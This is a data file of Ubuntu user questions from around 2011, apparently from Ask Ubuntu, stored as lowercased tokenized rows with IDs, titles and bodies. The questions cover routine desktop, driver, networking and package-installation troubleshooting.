51314	symbolic link does n't use target working directory	i 've created the following symbolic link : source : /usr/local/android-ndk-r5/ndk-build destination : /usr/local/bin/ndk-build however , when i attempt to use ndk-build from my source directory , it fails because it ca n't find files that the script depends on in the source directory . how can i get the symbolic link to use the source directory as the working directory ?
51315	how do i search for binary ( openoffice files ) which contain specific text ?	i am trying to locate an openoffice file which contains some text but i do n't know the file name . is there any possible way to locate said file using the ubuntu 's search file tool ? if so how . it seems the search tool under places only looks into plain text files . how should i proceed without using the command prompt ?
51321	modules loading despite being added to the blacklist	i 'd like to blacklist a couple of modules , namely drm , drm_kms_helper , i2c_algo_bit and i915 to forbid my integrated intel gpu to be used , but to use my nvidia mxm card instead . i inserted the following lines into /etc/modprobe.d/blacklist.conf : blacklist i915 blacklist drm blacklist drm_kms_helper blacklist i2c_algo_bit despite the above right after rebooting my laptop and typing lsmod i can see these modules loaded . why does my blacklist get utterly disrespected and what can i do about it ?
51324	unity top panel flickering with fullscreen wine apps	when i run a wine app in fullscreen the top unity panel is visible flickering through it on and off . the `` legacy fullscreen support '' does not help , when running without compiz ( unity 2d ) everything is fine .
51325	how to associate all file types within wine with its corresponding native application ?	this is easily done for a single file type , as answered in how to associate a file type within wine with a native application ? , by creating a .reg for the desired filetype . but this is for avi only . i use some wine apps ( utorrent , soulseek , eudora , to name a few ) that can launch a wide range of files . email attachments , for example , can be jpg , doc , pdf , pps ... its impossible ( and not desirable ) to track down all possible file types that one may receive in an email or download in a torrent . so i neeed a solution to be more generic and broad . i need the file association to honor whatever native app is currently configured . and i want this to be done for all file types configured in my system . i 've already figured out how to make the solution generic . simply replacing the launched app in .reg for winebrowser , like this : [ hkey_classes_root\.pdf ] @ = '' pdffile '' '' content type '' = '' application/pdf '' [ hkey_classes_root\pdffile\shell\open\command ] @ = '' c : \\windows\\system32\\winebrowser.exe \ '' % 1\ '' '' ive tested this and it works correctly . since winebrowser uses xdg-open as a backend , and converts my windows path to a unix one , the correct ( linux ) app is launched . so i need a `` batch '' updater to wine 's registry , sort of a wine-update-associations script that i can run whenever a new app is installed . maybe a tool that can : list all mime types types in my system that have a default , installed app associated extract all the needed info ( glob , mime type , etc ) generate the .reg file in the above format the tricky part is : i 've searched a lot to find info about how association is done in ubuntu 10.10 onwards , and documentation is scarce and confusing , to say the least . freedesktop.org has no complete spec , and even gnome docs are obsolete . so far i 've gathered 4 files that contain association info , but im clueless on which ( or why ) to use , or how to use them to generate the .reg file : ~/.local/share/applications/mimeapps.list ~/.local/share/applications/miminfo.cache /usr/share/applications/miminfo.cache /etc/gnome/defaults.list any help , script or explanation would be greatly appreciated ! thanks !
51328	unity 's gone ! how do i get it back ?	earlier today my unity desktop disappeared : i got a black screen with white text , but it disappeared too quickly for me to read . when the desktop reappeared , it was the ubuntu classic desktop . i used $ unity -- reset but that did not do anything . i tried rebooting so i could choose unity from the list when i logged in , but although there was ubuntu choice , there was no unity listed ( but classic was listed ) . i was able to install unity 2d and am using that , but really want to get 3d back . i had been using ubuntu without problems for several weeks when this happened . my graphics card is onboard a dell latitude desktop - a couple years old - and is reported as an intel g33/g31 . i 've looked at other requests for help here , and tried suggestions when they seemed to relate to similar problems , but nothing seems to work so far . any ideas ? thanks ! this is part of the output of my latest attempt to run unity -- reset window manager warning : 0x3e01c35 ( ) appears to be one of the offending windows with a timestamp of 1309472834 . working around ... window manager warning : last_user_time ( 1309473695 ) is greater than comparison timestamp ( 1126160 ) . this most likely represents a buggy client sending inaccurate timestamps in messages such as _net_active_window . trying to work around ... window manager warning : 0x4c0046c ( mdk @ habane ) appears to be one of the offending windows with a timestamp of 1309473695 . working around ... window manager warning : received a net_current_desktop message from a broken ( outdated ) client who sent a 0 timestamp window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0x4c0046c ( mdk @ habane ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed .
51335	please help me understand libraries/includes	i 'm trying to understand how libraries work . for example i downloaded a tarball and extracted it . now i do `` ./configure '' , it searches in pre-defined directories from what i understand for certain library files . what does it do then ? it creates a makefile , and the makefile contains the paths to these libraries ? than i do `` make '' , it complies the source code and hard-codes the locations of the libraries ? am i correct ? i do not really understand if libraries are files with pre-defined paths or the os somehow gives access to the libraries through system calls . another example , i complied something on my computer than moved it to a remote server , the executable needs mysql libraries to work , the server has mysql but for some reason when execute the file it tells me `` ca n't find libmysqlclient.so.16 '' . is there a solution for this ? is there a way to know where is tries to locate this file or give it another path ? i ca n't compile it on the server since it has no compiler and i do n't have root access to install packages last question is if in the sequence `` ./configure '' , '' make '' , '' make install '' the `` make install '' command is the only one that actually puts files outside the directory in which these files reside ? if for example the software will be installed in /usr/local/ is the `` make install '' command the only one that will require `` sudo '' before it ? let me see if i got it correctly : `` ./configure '' creates the makefile according to the location of various files on your system . `` make '' compiles the source code according to this makefile . and `` make install '' moves the files to their appropriate location . i know this has been very long i thank anyone who had the patience to read my question : )
51339	how to format a partition with hfs+journalized filesystem ?	i want to make a partition with hfs+journalized format . first i make a partition with command 'fdisk ' and then i want to use command 'mkfs ' to format the partition , but i can not find the hfs+journalized format , i can find hfs+ format only .
51343	ca n't echo $ catalina_home	when i echo $ catalina_home i get a blank line , but when i ls $ catalina_home i correctly get a listing of the directory . why ca n't i echo it ? i am running ubuntu 11.04 .
51351	wireless not detected on an hp pavilion g6 - rt5390pcie	i just bought an hp pavilion g6 laptop and i installed natty narwhal alongside windows 7 . in windows 7 , my wifi works perfect but in ubuntu it absolutely ( no matter what i do ) wo n't detect my home wifi network . here is the output of `` lspci '' : earl @ ubuntu : ~ $ lspci 00:00.0 host bridge : advanced micro devices [ amd ] rs880 host bridge 00:01.0 pci bridge : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( int gfx ) 00:04.0 pci bridge : advanced micro devices [ amd ] rs780 pci to pci bridge ( pcie port 0 ) 00:05.0 pci bridge : advanced micro devices [ amd ] rs780 pci to pci bridge ( pcie port 1 ) 00:06.0 pci bridge : advanced micro devices [ amd ] rs780 pci to pci bridge ( pcie port 2 ) 00:11.0 sata controller : ati technologies inc sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : ati technologies inc sbx00 smbus controller ( rev 42 ) 00:14.1 ide interface : ati technologies inc sb7x0/sb8x0/sb9x0 ide controller ( rev 40 ) 00:14.2 audio device : ati technologies inc sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : ati technologies inc sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : ati technologies inc sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:16.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:05.0 vga compatible controller : ati technologies inc m880g [ mobility radeon hd 4200 ] 01:05.1 audio device : ati technologies inc rs880 audio device [ radeon hd 4200 ] 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 03:00.0 network controller : ralink corp. device 5390 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5209 ( rev 01 ) earl @ ubuntu : ~ $
51355	recover php , html and css files using photorec	i need to recover only the above mentioned files from an ntfs partition , but i do n't find these files in file opts menu of the photorec ( included in testdisk 6.12 ) . please suggest how to go about it . thanks
51358	i can not read second internal hd	i reformatted my win `` c '' drive and loaded ubuntu 11.04 . the second internal hd of course is not read . it is shown in 'disk utility ' . i try to mount it in disk utility but i get an error message error mounting : mount exited with exit code 1 : helper failed with : mount : according to mtab , /dev/sda1 is already mounted on / one problem i see is the error relates to sda1 , but i am trying to mount sdb . unfortunately , i am windows literate and ignorant of the coding for linux . can someone help me with the code to mount my second drive ( sdb ) nathan
51359	how to install firefox-5 without a ppa ?	i want to install firefox 5 on my work lucid machine . however , i ca n't access external repositories from my machine , so ppas are ruled out . what alternative methods are available to install firefox 5 ?
51362	why not sync folders outside home with ubuntu one ?	it took me a while to find out that with ubuntu one i can sync only folders in my home folder . on all other folders the ubuntu one option is available in preferences , but the actual actions are greyed out . the ubuntu one faq is quite clear on that : no , currently you can only select to synchronize folders inside your home directory . but i actually wonder why and if this is going to change and if there is a trick around it ( an other one than setting my home to / ) ? i personally do n't have any important data in my home folder other than the program configs . all documents , pictures , music are on a folder called /data that is actually on a different partition . that makes it much easier when one wants to reinstall ubuntu .
51364	how to repair ods files	i have few ods files but all of a sudden it is not opening . when i open the file i get the following error . please look at the below snapshot error on opening the file with archive manager : karthick @ karthick : /media/datas $ zip -ff data.ods -- out repaired_file.ods fix archive ( -ff ) - salvage what can found end record ( eocdr ) - says expect single disk archive scanning for entries ... copying : mimetype ( 46 bytes ) copying : configurations2/statusbar/ ( 0 bytes ) copying : configurations2/accelerator/current.xml ( 2 bytes ) copying : configurations2/floater/ ( 0 bytes ) copying : configurations2/popupmenu/ ( 0 bytes ) copying : configurations2/progressbar/ ( 0 bytes ) copying : configurations2/menubar/ ( 0 bytes ) copying : configurations2/toolbar/ ( 0 bytes ) copying : configurations2/images/bitmaps/ ( 0 bytes ) copying : content.xml zip warning : no end of stream entry found : content.xml zip warning : rewinding and scanning for later entries
51366	how do you install firefox 4 using a ppa repository ?	since firefox 5 has been released firefox 4 seems to have been removed from the mozilla repositories ( i.e . force version can not be used ) .
51367	how do i configure my caching nameserver to validate dnssec ?	since the root of the dns tree has been signed , how do i change my caching dns server to start validating dnssec signatures ?
51372	unmet dependencies error while installing uuid-dev	i 'm getting the following error : the following packages have unmet dependencies : uuid-dev : depends : libuuid1 ( = 2.17.2-0ubuntu1.10.04.1 ) but 2.17.2-0ubuntu1.10.04.2 is to be installed have n't been able to find much useful information online .
51378	login keyring prompt appears twice on login	whenever i log into my ubuntu desktop machine , a password dialogue appears for the login keyring . once i 've entered the password , it comes up again ( and this is n't because i got it wrong the first time ) . the password is the same as my account password , so what 's going on ? update : this is what it looks like ( i get two of these in succession ) :
51382	`` eisa : can not allocate resource for mainboard '' error on installation	i 'm trying to install linux ubuntu on my system . i made my self a usb linux and rebooted using the usb . the usb was recognized and started and after choosing presistent mode / live mode , linux begin to start until this error : eisa : can not allocate resource for mainboard i rebooted and tryed the install option but still got the same error . i rebooted again , with live linux , this time it worked and i was in linux , i restarted to get in the presistent mode , and again the same problem , then tryed linux live again , it didnt work anymore . i recived the same problem . i really ca n't understand what is wrong . sometimes it works sometimes it does't . the strange thing is , it worked one time , and i reached the linux desktop . i just restarted and nothing works again . has anyone faced this before ?
51387	why does n't mozilla release .deb and .rpm packages for their software ?	i use and enjoy firefox on my ubuntu 10.04.2 laptop ( although firefox needs work for the linux/ubuntu version ) . yet i realize that in comparison to other pieces of software that have an `` ubuntu/debian '' version ( .deb file , and usually .rpm files as well ) . i do n't see it in one of the most profound assets of the floss world . the question is - why ? if google chrome/ium can , why ca n't they ? it will be easier to get up-to-date software and features and so forth .
51394	my webcam is not working with google+ hangout , can i make it work ?	i just got an invitation for google+ , the video conference feature `` hangout '' is the first feature i checked out , and unfortunately the webcam is not working , the mic and speakers work ok . when i started it , it recquired me to install a new version of google talk plugin 2.1.7.0 . it seems that now the gmail chat and the chat within empathy ( that used to work ) does not work either . in the settings of the webcam in google hangout window my only option , is gspca driver . notice that my cam had problems with skype , and i had to go around it by env ld_preload=/usr/lib/libv4l/v4l2convert.so skype how can i make it work ?
51398	how to build ubuntuone-client so that it does n't depend on nautilus and gnome	basically i want to build ubuntuone-client so that it does n't have nautilus and gnome related dependencies . can this be done ? if so how ?
51404	legal issue with bundling gnome3 on ubuntu install ?	if i successfully install gnome 3 on ubuntu 11.04 and make it available as a fresh install out there , would that be illegal ?
51407	time out while mounting samba share	i am trying to mount a hard-disk connected to my wdtv live box . the following command smbclient -l 192.168.1.2 -u guest gives the following output : domain= [ workgroup ] os= [ unix ] server= [ samba 3.5.1 ] sharename type comment -- -- -- -- - -- -- -- -- -- - expansion_drive disk expansion_drive microvault disk microvault ipc $ ipc ipc service ( wdtv live ) domain= [ workgroup ] os= [ unix ] server= [ samba 3.5.1 ] server comment -- -- -- -- - -- -- -- - wdtvlive wdtv live workgroup master -- -- -- -- - -- -- -- - workgroup but if i try sudo smbmount //wdtvlive/expansion_drive /home/ashish/wdtvlive/ -o guest , rw i get the following : warning : mapping 'guest ' to 'guest , sec=none' mount error ( 110 ) : connection timed out refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) i am able to browse and mount through nautilus as well , but i dont want the drive to be mounted at gvfs .
51410	xfce gets really confused about session saving , etc	i 'm getting a new laptop running with 11.04 ubuntu . i 've got the xfce4 packages all installed , which is something i 've had no problems with on any of my other machines . on this new laptop , however , though i can log in and use an xfce session without any problems , logging out of a session is problematic : i click the `` log out '' widget from the panel and then `` log out '' from its option dialog . then the thing just sits there , not logging out . subsequent attempts to open the `` log out '' widget fail with an error about the session manager being busy . after maybe a minute or so , it logs out . though i 've got the `` save session '' option checked in the log out dialog , xfce just makes a complete hash of the business . it does remember the applications that i had running , but it seems to forget about the window manager ( ! ! ) and the workspace configuration . i do n't log in/out that often , and generally i do n't care much about restarting applications , but the window manager being missing is of course pretty annoying . i like xfce because it 's simple and unobtrusive and usually works pretty well . i 've never experienced this , and i 've got two other machines also running 11.04 with pretty much the same setup ( straight ubuntu install with xfce4 packages added ) . is there some good way to diagnose stuff like that ?
51411	problems in gnome-shell and gnome3 in ubuntu 11.04 ?	how is gnome3 reliability in natty 11.04 ? do you think production machines can be migrated to it or it 's too early ? i mean i 'd like to move to it but i do n't want to spend a lot of time fixing a broken gnome installation ...
51412	libreoffice export compatibility with .doc	i know i can open .doc files in libreoffice , but can i save a new document as a .doc ? you used to be able to do so in openoffice , but i ca n't find anything in libreoffice to do that .
51415	how can i make qsstv recognise my sound device	after reading this article from instructables i wanted to try it out in ubuntu . luckily qsstv is available but i 'm having problems getting it to work properly . when pressing the green light ( to receive data ) i get this error : after going to options > configure > interfaces i discovered that it 's attempting to use /dev/dsp which does n't appear to exist . in my /dev folder there are no files that reference sound devices and i 've tried all of the devices in /dev/snd but unfortunately none of them work . is there a specific audio device that i should be linking to ?
51420	application menu support for libreoffice 3.4.1	i have installed libreoffice 3.4.1 . on the website it say that it has global menu support . this does n't work . i have downloaded a newer version of the package lo-menubar which does n't work either . i do n't know if it is the newest version . i 've tried the libreoffice v3.4.0 workaround but that also did not work . is it possible to get the application menu working for libreoffice 3.4 ?
51423	slow copying from dvd	i have very low speed when copying files from dvd ( about 2-3 mb/s ) . hdparm -tt /dev/sr0 /dev/sr0 : timing cached reads : `2224 mb in 2.00 seconds = 1112.00 mb/sec timing buffered disk reads : 8 mb in 3.70 seconds = 2.16 mb/sec how can i increase speed ?
51426	advice on partitioning	i want advice on how to setup partitions on a new desktop system that i 'll ( initially ) put ubuntu 11.04 on . the system will have the following storage hardware : 1 x 80 gb ssd ( intel 320 series ) 2 x 2 tb hdd ( green , 64 mb cache , 5400 rpm , sata-600 ) i 'm going to use the system to typeset with latex , to watch movies , to listen to music , to edit images and graphics , to surf the web , as firewall for my lan and as file and backup server for a laptop ( it will sometimes need to be on for days ) . some of the data i 'm going to keep on it is really valuable so i 'm not giving priority to speed over reliability or security . also , i want to avoid unnecessary wear on the ssd . the setup i 'm considering is the following : have the ssd as boot partition , format it as ext4 ( does ext4 work well with ssds ? ) and mount it at / . backup from the ssd will be handled by having sbackup scheduled to backup chosen files to the hdds . put the hdds in raid-1 , mostly for reliability , format them as ext4 ( for reliability and ability to recover from corruption ) and mount it somewhere , maybe /home/archive ( what is the correct mount point according to convention ? ) . backup for these hdds will simply be having them in raid-1 . also , i 'll keep the swap ( how big ? ) on these hdds . i 'm thinking that i should take measures to reduce wear on the ssd by mounting it with the flags noatime and discard and keep the swap on the hdds ( the system will have 4 gb ram but i want to be able to hibernate ) . to further handle what goes on the ssd and what goes on the hdds i 'm thinking about using symlinks ( e.g . symlink ~/videos to the hdds ) . i should say something about the needed storage capacity too . what i plan to initially put on the hdds is ~400 gb . my question : is there anything in the setup that i 'm considering that i should change given the mentioned hardware and the mentioned usage of the system ? or more generally : how should i setup my partitions given my hardware setup and how i want to use the system ?
51427	i want to completely remove titlebars from windows	i want to completely remove titlebars from windows ... but still have shadows via window decorations . i am using the elementary borderless theme and compiz . but it does n't matter too much which theme i use , i suppose . basically i want to get rid of all window decorations except for the shadows . what should i look for in my theme file to get rid of the titlebars ? or is there a better way ? i 'd rather not use emerald or another window manager right now . i mainly use keyboard shortcuts for all window activities .
51434	why are n't there multiple notifications ? and how to enable ?	i noticed in ubuntu 11.04 there are only two notifications allowed at once , one being for sound , etc ... and the other for all applications . i am using udev-notify and my computer likes to dump my webcam and whenever that happens , there are two popups just for it being disconnected and then two more for re-connecting it which takes forever to see since i have to wait for each to close . is there a way to enable multiple notifications ?
51442	wireless can not ping router after five minutes inactivity	as the title says when i do n't use the net for ~5 mins i can not resolve hostnames , either via browser or using apt-cache or similiar . wget will return the first line and just timeout . i need to modprobe -r and modprobe r8192e_pci to get things working again . i 've blacklisted r8192se_pci using the /etc/modprobe.d/blacklist.conf file . running 11.04 clean install on a samsung n-130 netbook and connecting to a wpa2 router . anyone else experienced this issue ? any suggested fixes ? update still no joy , although i can confirm that when the issue happens it 's not just the dns that goes , i can not ping beyond the laptop .
51444	display non-critical notifications when totem is playing video	when i 'm watching videos in totem , only critical notifications are displayed . to me , it is more important to get these notifications when i 'm watching a video in full screen , because then there is nothing else to indicate that something has happened . i currently have to switch back and forth in order to see if i have been notified of something . it seems very unnecessary . i need to display all notifications . is this configurable , or how do i fix this ?
51445	how do i calibrate a touchscreen on a dual monitor system ?	i have a dual monitor setup of two different sizes . my primary monitor is a 23 in widescreen acer t230h touchscreen , and the second is a regular 20 in . when i go to use the touchscreen , the cursor shows up on the secondary display depending on where i touch the display . how do i calibrate it to only control my primary monitor ?
51448	no ubuntu one in evolution	i 'm looking to sync my contacts with ubuntu one , and the problem with any instructions on how to do this is that they mention a ubuntu one - > couchdb folder under contacts but i see no such thing .
51450	installing lo-menubar package for libreoffice 3.4rc	i 've had a problem installing the lo-menubar package ( unity integration for libreoffice menubar ) . it seems that lo-menubar package has assumed 3.3.3 as default version of libreoffice . but whenever i delete the libreoffice package and make a clean install of the 3.4 package , i ca n't find any icon of this version . in the terminal , running libreoffice3.4 gives this message : `` command not found '' , but on synaptic i can see that libreoffice 3.4 is fully installed . could you please give me a help on this ?
51452	windows-like global shortcuts with the < super > key in xubuntu	i would to define windows-like shortcuts using the super ( `` windows '' ) key . i 'm running xubuntu 11.04 ( natty ) . using settings- > settings manager- > windows manager- > keyboard i assigned super+d to `` show desktop '' . then , using settings- > settings manager- > keyboard- > applications shortcut i assigned super+e to thunar . so far , everything works perfectly . but , at least , i 'd like the super key when pressed alone to open the applications menu but , being super a modifier key i was n't able to assign it alone to a shortcut . for reference this problem is also described here . based on this forum post i used to xmodmap to make it behave like a normal key - ie . not a modifier key . and guess what , it works . sorta . super alone works perfectly . super+e still opens thunar but also opens the applications menu . super+d no longers works at all . of course , i can just remove my .xmodmap file and assign a super+a or similar to applications menu . but if there 's a way to get just super working it would be great . can someone shed some light on this issue ?
51453	how do i troubleshoot a `` connection failed '' error when using `apt-get install` ?	i need to install and run some 32-bit software on my 64-bit ubuntu 11.04 machine , so it was suggested i run sudo apt-get install ia32-libs . i got the following : $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : lib32asound2 lib32bz2-1.0 lib32gcc1 lib32ncurses5 lib32ncursesw5 lib32stdc++6 lib32v4l-0 lib32z1 libc6-i386 suggested packages : lib32asound2-plugins the following new packages will be installed : ia32-libs lib32asound2 lib32bz2-1.0 lib32gcc1 lib32ncurses5 lib32ncursesw5 lib32stdc++6 lib32v4l-0 lib32z1 libc6-i386 0 upgraded , 10 newly installed , 0 to remove and 21 not upgraded . need to get 60.3 mb/65.2 mb of archives . after this operation , 212 mb of additional disk space will be used . do you want to continue [ y/n ] ? err http : //us.archive.ubuntu.com/ubuntu/ natty/universe ia32-libs amd64 20090808ubuntu13 connection failed [ ip : 172.22.140.250 8080 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/universe/i/ia32-libs/ia32-libs_20090808ubuntu13_amd64.deb connection failed [ ip : 172.22.140.250 8080 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? so i ran sudo apt-get update and then sudo apt-get -m install ia32-libs , which installed all the packages except ia32-libs . now i 'm getting : $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : ia32-libs 0 upgraded , 1 newly installed , 0 to remove and 21 not upgraded . 8 not fully installed or removed . need to get 60.3 mb of archives . after this operation , 199 mb of additional disk space will be used . err http : //us.archive.ubuntu.com/ubuntu/ natty/universe ia32-libs amd64 20090808ubuntu13 connection failed [ ip : 172.22.140.250 8080 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/universe/i/ia32-libs/ia32-libs_20090808ubuntu13_amd64.deb connection failed [ ip : 172.22.140.250 8080 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? how do i troubleshoot this problem ? this machine is behind a firewall , so that could be the problem . but i think it 's unlikely since all the other packages were downloaded without a problem . update : now when i run sudo apt-get install ia32-libs i get : $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 lib32asound2 e : package 'ia32-libs ' has no installation candidate i tried sudo apt-get update , but get the same results when i tried sudo apt-get install ia32-libs again afterward . did the ia32-libs package really disappear since i last tried it ? or is this the result of an environmental issue caused by what i did to try to work around the problems above ?
51459	how to regain use of empathy ?	so i do n't actually know what happened , but i altered the .desktop file of empathy ( i added skype as a quicklist shortcut ) but for some reason , that removed empathy from the messaging menu indicator . so i thought uninstalling and reinstalling empathy might right everything that was wrong , but now when i try to install i get an error message that says : the following packages have unmet dependencies : empathy : depends : libcamel-1.2-23 ( > = 3.0 ) but it is not going to be installed depends : libcamel-1.2-23 ( < 3.1 ) but it is not going to be installed depends : libgck0 ( > = 2.91.1 ) but it is not going to be installed depends : libgcr-3-0 ( > = 2.91.4 ) but it is not going to be installed depends : libgnome-control-center1 ( > = 1:2.91.2 ) but it is not going to be installed depends : libnspr4 ( > = 4.7.0~1.9b1 ) but 4.8.7-0ubuntu1 is to be installed depends : libnss3 ( > = 3.12.2~rc1 ) but 3.12.9+ckbi-1.82-0ubuntu2 is to be installed depends : libsqlite3-0 ( > = 3.7.3 ) but 3.7.4-2ubuntu5 is to be installed depends : libunity4 ( > = 3.4.6 ) but 3.8.4-0ubuntu1 is to be installed depends : empathy-common ( = 3.1.2.1-1ubuntu1~ppa11.04+1 ) but 3.1.2.1-1ubuntu1~ppa11.04+1 is to be installed depends : gsettings-backend but it is a virtual package
51460	google desktop hotkey ctrl+ctrl does n't work	i recently installed google desktop linux on my machine . the machine currently runs xubuntu 11.04 ( natty ) . it seems to be working fine , it shows up on the notification area ( i do n't know if this is the correct term - it shows up near the indicator plugin ) and double clicking on it will open the quick search box but the same box does n't show up when i use the hotkey ( ctrl+ctrl ) . googling i found those two posts on google help forums : i 'm having trouble installing google desktop over xubuntu with xfce , what 's wrong ? this one suggests that the packages menu , menu-xdg and gnome-menu . i assume the later must be a type for the package gnome-menus since there is no gnome-menu on my package list . all three packages are installed . i press ctrl twice but i do n't see the quick search box . this time google suggest a fix for kde systems and to check if gdl_box is running . gdl_box is running .
51467	how do i setup an email account in evolution ?	help to activate evolution email - to receive my centurylink emails .
51470	is gnome2.x going to be completely obsolete from all linux distro ?	i do n't quite like gnome3 , or maybe it 's just unity ( for the moment ) ? was wondering if all linux distro is going to eventually adapt and move to gnome3 and have similar interface ? i know there is classic login , but as for now , i do n't quite like the global app menu and huge not yet so friendly to modify the dock , and was hoping to stick to gnome2.x as long as possible . when will gnome2.x be unsupported ?
51471	driver for nvidia 7600 gt	i have problems with the drivers for nvidia 7600 gt . i have tried many guides but always the system crashes after some hour . i do n't know which is the proper driver for this card . i use ubuntu 11.04 ...
51474	ubuntu installation error on intel pentium 4 3.06ghz	i downloaded ubuntu 11.04 , and whenever i try to install it i get an error . i tried this from windows , and from cd too ! first it shows a screen with lots of colorful dots . a table comes up with data and prog . then the error shows : not syncing - too many boot vars in 'c ' , swapper not tainted 2.6.38 , panic , serial console , start_kernel +x2700x366 , i386_start_kernel+0xc0/0xc0
51475	safe home network through wifi	maybe this is such an obvious question that it 's a duplicate . i have ubuntu 10.10 on both my pc and laptop . the laptop connects to the internet through a wifi router . the pc connects to the same router with an ethernet cable . how can i safely share files between my pc and laptop through this router ? do i have to change the router 's config ? i 'll need ssl as the wifi is open at this moment , but i guess i can find info about that without a problem . once i 've done that , network printing should be easy : ) edit updated both to 11.10 . activated dhcp on the router to fix the ip addresses of both computers and the router now uses wpa2 . i have n't been able to set up nfs between the computers , but i did achieve a safe ftp server connection .
51480	use ecryptfs for ubuntu one with an already encrypted home directory	i 'd like the idea of having one encrypted folder on ubuntu one . there are current howtos in the internet how to set it up with encfs or ecryptfs . i 'd like to use ecryptfs - not because of speed as speed does n't really matter that much if you 're storing your data in the cloud - but as i 've been already using ecryptfs , got used to it and therefore do n't really like to use another solution as well . the problem with the ubuntu one folder is , that it 's part of the user 's home folder . with recent ubuntu versions in many cases the user 's home folder gets already encrypted with ecryptfs and you ca n't use ecryptfs ( for a ubuntu one folder ) on top of ecryptfs ( of the user 's home directory ) . so what could one do ? of course use encfs instead . or move the ubuntu one folder out of the user 's home folder . any other ideas or suggestions ?
51482	usb3 device only detected as usb2 device	i 've got a bug filed as my usb3 thumb drive in maverick and natty only gets detected as a usb2 device ( please find some details below ) . launchpad bug record has anyone an idea how to troubleshoot that further or get it fixed ? can anybody confirm usb3 devices working on an asus m4a88td-v evo/usb3 motherboard ( with a nec upd720200 usb 3.0 onboard chip ) on any of both usb3 ports ? what i 've also done to troubleshoot/fix without success is : checked all usb ports to be sure not to use the wrong one blacklisted the usb2 kernel module ( ehci_hcd ) to enforce loading of usb3 kernel module ( xhci_hcd ) while connecting the thumb drive checked different upstream kernel instead of the default ubuntu kernel checked different ubuntu kernel ( also from kernal-ppa )
51486	how to upgrade to a 2.6.39 kernel ?	kernel ppa is empty . https : //launchpad.net/~kernel-ppa/+archive/ppa is available 2.6.39.2 kernel for natty ? how to upgrade ?
51489	how to integrate psi ( or psi+ ) into the messaging menu ?	i 've just installed psi , but it does n't integrates into the messaging menu . is there any way to do this ? ( plugin , etc ... )
51491	getting all the codec in a pack	i installed ubuntu 11.04 , now when ever i try to play mp3 or any such files it searchs for codecs . is there any pack which bundles all the required codec for famous formats [ mp3 , mpg , wmv , flv , ... ] ?
51492	monitor network status on ubuntu 11.04	how to monitor bytes received/sent in a network session in ubuntu ? i 'm very new to ubuntu , so dont give links which requires to compile files or so ...
51496	unity launcher bar stuck and wo n't hide	when using drag and drop the launcher bar reveals and will not hide unless i close the program . is their a fix ?
51504	boot options menu disappeared	i had windows 7 and ubuntu both installed on my machine , but for some reasons i re-installed windows 7 , and now when the system starts , i ca n't see grub menu , which normally appears asking using for windows or ubuntu os . how to bring that menu back ? thanks
51512	after removing fglrx and ati drivers can not login	i was running kubuntu 10.10 with ati drivers ( 11-5 ) . for some problems , i re-installed ati-drivers to install lastest version ( 11-6 ) but before install the new driver i reinstalled fglrx as described here then rebooted . now when i start my computer it boots up and later show kubuntu progress bar then fade off with random colors and goes black completely . how can i fix this without needing to reinstall the whole system ?
51513	can i save a copy of the lamp stack locally ?	is there any way to download lamp and save it to the hdd so next time if i install a newer ubuntu i dont have to download it again ? i just switched to ubuntu today , is there anyway to save the exe like we do it in windows ? the error : reading package lists ... done building dependency tree ... 50 % building dependency tree reading state information ... done package gstreamer0.10-plugins-ugly is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gstreamer0.10-plugins-ugly ' has no installation candidate sou @ ubuntu : ~ $ sou @ ubuntu : ~ $ sudo apt-get install apache2 mysql-server php5 reading package lists ... done building dependency tree reading state information ... done package apache2 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mysql-server is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package php5 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'apache2 ' has no installation candidate e : package 'mysql-server ' has no installation candidate e : package 'php5 ' has no installation candidate
